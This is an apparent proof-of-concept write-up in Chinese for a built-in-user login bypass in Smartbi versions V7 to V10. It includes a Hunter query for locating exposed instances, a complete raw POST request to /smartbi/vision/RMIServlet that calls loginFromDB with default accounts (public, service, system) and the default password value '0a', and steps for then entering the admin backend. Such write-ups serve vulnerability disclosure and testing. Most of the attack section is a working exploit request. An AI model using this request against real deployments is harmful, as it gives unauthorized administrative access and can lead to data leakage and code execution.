POC/wpoc/思迈特/Smartbi内置用户登陆绕过漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

59 lines
2.8 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Smartbi内置用户登陆绕过漏洞
# 一、漏洞简介
Smartbi大数据分析产品融合BI定义的所有阶段对接各种业务数据库、数据仓库和大数据分析平台进行加工处理、分析挖掘和可视化展现满足所有用户的各种数据分析应用需求如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等Smartbi在安装时会内置几个用户在使用特定接口时可绕过用户身份认证机制获取其身份凭证随后可使用获取的身份凭证调用后台接口可能导致敏感信息泄露和代码执行。
# 二、影响版本
+ V7 <= Smartbi <= V10
# 三、资产测绘
+ hunter`app.name=="SMARTBI 思迈特"`
![1692015464478-003bd803-eb83-4cf4-a640-dadf6bb7867c.png](./img/lnCsT28Xnl-0EUXv/1692015464478-003bd803-eb83-4cf4-a640-dadf6bb7867c-424799.png)
+ 登录页面
![1692015491752-22149cdc-3ef4-4506-a96d-72460562ef79.png](./img/lnCsT28Xnl-0EUXv/1692015491752-22149cdc-3ef4-4506-a96d-72460562ef79-181146.png)
# 四、漏洞复现
1. 访问POC出现如下情况则可能存在漏洞
```plain
/smartbi/vision/RMIServlet
```
![1692016139611-568c3342-2a55-46ff-92d8-f1ddc6579731.png](./img/lnCsT28Xnl-0EUXv/1692016139611-568c3342-2a55-46ff-92d8-f1ddc6579731-883447.png)2. 使用POST请求如下params其中的第一个参数是内置的三个用户名public、service、system可随机构造绕过登录,第二个参数是三个账号默认的密文密码(默认值为0a),当响应如下,且`result`参数为`true`时表示存在漏洞。
```plain
POST /smartbi/vision/RMIServlet HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: identity
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=B08E6669BFA8E9D85FB6BD98411C349C
Origin: https://smartbi.cy-sys.cn
Referer: https://smartbi.cy-sys.cn/smartbi/vision/RMIServlet
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Length: 81
className=UserService&methodName=loginFromDB&params=["system","0a"]
```
![1692022082661-3bf7889b-3fb3-4ef3-a1e1-628a7177aa0e.png](./img/lnCsT28Xnl-0EUXv/1692022082661-3bf7889b-3fb3-4ef3-a1e1-628a7177aa0e-823591.png)
3. 访问`https://xx.xx.xx.xx/smartbi/vision/index.jsp`成功进入后台
![1692022285213-e9394429-fba8-4237-8c14-0ec583bf0151.png](./img/lnCsT28Xnl-0EUXv/1692022285213-e9394429-fba8-4237-8c14-0ec583bf0151-880868.png)
> 更新: 2024-02-29 23:55:51
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fkhbh9sf2269nv0m>